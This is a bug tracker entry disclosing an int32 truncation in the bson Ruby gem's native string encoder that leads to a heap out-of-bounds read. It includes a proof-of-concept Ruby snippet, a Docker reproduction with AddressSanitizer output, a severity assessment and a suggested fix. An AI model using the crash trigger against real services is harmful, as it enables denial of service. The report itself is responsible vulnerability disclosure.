-
Type:
Bug
-
Resolution: Fixed
-
Priority:
Unknown
-
Affects Version/s: None
-
Component/s: BSON
-
None
-
None
-
Fully Compatible
-
Ruby Drivers
-
Not Needed
-
None
-
None
-
None
-
None
-
None
-
None
Summary
BSON::ByteBuffer#put_string truncates Ruby string lengths to int32_t before UTF-8 validation. A string of length 2**31 wraps negative, is converted to a huge size_t, and drives the native UTF-8 validator past the end of the heap allocation.
Affected version
- Software: bson gem
- Version: 5.2.0
- Commit: dcae7f483a262305159ae8b2711cf359f7d9af65
Details
The native string encoder uses int32_t length to receive the result of RSTRING_LEN, even though Ruby strings can be larger than INT32_MAX.
ext/bson/write.c:209
static VALUE pvt_bson_encode_to_utf8(VALUE string) { VALUE existing_encoding_name; VALUE encoding; VALUE utf8_string; const char *str; int32_t length; ... str = RSTRING_PTR(utf8_string); length = RSTRING_LEN(utf8_string); rb_bson_utf8_validate(str, length, true, "String");
RSTRING_LEN returns long (64-bit on modern platforms). Assigning it to int32_t silently truncates any string of 2 GB or more. A string of exactly 2**31 bytes produces INT32_MIN (-2147483648). That value is passed directly to rb_bson_utf8_validate, whose second parameter is size_t:
ext/bson/libbson-utf8.c:105
void rb_bson_utf8_validate (const char *utf8, size_t utf8_len, bool allow_null, const char *data_type) { ... for (i = 0; i < utf8_len; i += seq_length) { _bson_utf8_get_sequence (&utf8[i], &seq_length, &first_mask);
The implicit conversion of a negative int32_t to size_t wraps to a value near UINT64_MAX. The loop then iterates far past the end of the string, and the first byte read in _bson_utf8_get_sequence is performed out of bounds:
ext/bson/libbson-utf8.c:40
unsigned char c = *(const unsigned char *) utf8;
Proof of concept
require "bson" buffer = BSON::ByteBuffer.new huge = "A" * (2**31) warn huge.bytesize buffer.put_string(huge)
AddressSanitizer output
==859==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xffff75bfe801
READ of size 1 at 0xffff75bfe801 thread T0
#0 0xffff97dafa5c in _bson_utf8_get_sequence /tmp/src/ext/bson/libbson-utf8.c:40
#1 0xffff97dafc78 in rb_bson_utf8_validate /tmp/src/ext/bson/libbson-utf8.c:121
#2 0xffff97db71b8 in pvt_bson_encode_to_utf8 /tmp/src/ext/bson/write.c:226
#3 0xffff97db73c8 in rb_bson_byte_buffer_put_string /tmp/src/ext/bson/write.c:243
0xffff75bfe801 is located 0 bytes to the right of 2147483649-byte region
SUMMARY: AddressSanitizer: heap-buffer-overflow /tmp/src/ext/bson/libbson-utf8.c:40
in _bson_utf8_get_sequence
Reproduction
On a machine with Docker, run:
mkdir -p dfvuln-772-bson-put-string-oob cd dfvuln-772-bson-put-string-oob cat > poc_put_string_oob.rb <<'RUBY' require "bson" buffer = BSON::ByteBuffer.new huge = "A" * (2**31) warn huge.bytesize buffer.put_string(huge) RUBY docker run --rm -v "$PWD":/work -w /work ruby:3.3-bookworm bash -lc ' set -eux apt-get update -qq apt-get install -y -qq git build-essential pkg-config >/dev/null git clone --depth=1 https://github.com/mongodb/bson-ruby.git src cd src git rev-parse HEAD | tee /work/commit.txt bundle config set path vendor/bundle bundle install cd ext/bson make distclean >/dev/null 2>&1 || true ruby extconf.rb --with-cflags="-O0 -g -fsanitize=address -fno-omit-frame-pointer" \ --with-ldflags="-fsanitize=address" make -j"$(nproc)" cd ../.. cp ext/bson/bson_native.so lib/ ASAN_LIB=$(gcc -print-file-name=libasan.so) set +e LD_PRELOAD="$ASAN_LIB" \ ASAN_OPTIONS="detect_leaks=0:abort_on_error=0:symbolize=1" \ ruby -Ilib /work/poc_put_string_oob.rb 2>&1 | tee /work/asan.log status=${PIPESTATUS[0]} set -e test "$status" -ne 0 grep -q "ERROR: AddressSanitizer: heap-buffer-overflow" /work/asan.log '
This builds bson_native.so with ASan inside Docker, runs the PoC, and writes the raw sanitizer output to asan.log.
Independent confirmation
The report was reviewed against the current source tree at commit dcae7f483a262305159ae8b2711cf359f7d9af65. The defect is confirmed.
ext/bson/write.c contains two sites where RSTRING_LEN is assigned to int32_t: lines 214 and 241 (inside pvt_bson_encode_to_utf8 and rb_bson_byte_buffer_put_string respectively). On a 64-bit host, RSTRING_LEN returns long. The truncation is silent – no compiler warning, no runtime check. Passing the resulting negative value to rb_bson_utf8_validate (which takes size_t) is the direct cause of the out-of-bounds read described above.
Severity assessment
Low to Medium. The crash is real and reproducible as described. Practical exploitability is constrained by the requirement to allocate and pass a string of at least 2 GB. MongoDB drivers enforce a 16 MB per-document limit at a higher layer, so this path is unreachable in standard MongoDB usage. In contexts where the bson gem is used directly and no upstream size limit is enforced, an attacker who can supply a large enough string could crash the process. The impact is a heap out-of-bounds read, not a write; reliable code execution is not a plausible outcome on hardened platforms.
Suggested fix
In both pvt_bson_encode_to_utf8 and rb_bson_byte_buffer_put_string, change the length variable from int32_t to long (matching RSTRING_LEN's return type). Add an explicit bounds check before calling rb_bson_utf8_validate and before writing the 4-byte length prefix (BSON string length is encoded as int32_t, so strings longer than INT32_MAX bytes are invalid BSON regardless):
long length = RSTRING_LEN(utf8_string); if (length > INT32_MAX) { rb_raise(rb_eArgError, "String length %ld exceeds BSON maximum", length); }